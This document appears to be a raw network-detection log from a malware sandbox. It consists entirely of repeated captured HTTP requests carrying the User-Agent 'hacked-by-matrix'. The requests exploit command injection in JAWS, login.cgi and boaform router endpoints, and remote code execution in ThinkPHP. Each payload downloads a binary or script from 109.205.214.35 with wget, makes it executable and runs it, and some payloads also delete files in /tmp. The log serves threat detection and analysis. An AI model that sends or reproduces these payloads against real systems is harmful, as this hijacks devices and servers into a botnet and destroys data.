          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
          Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1User-Agent: hacked-by-matrixHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
          Source: global trafficHTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: hacked-by-matrix
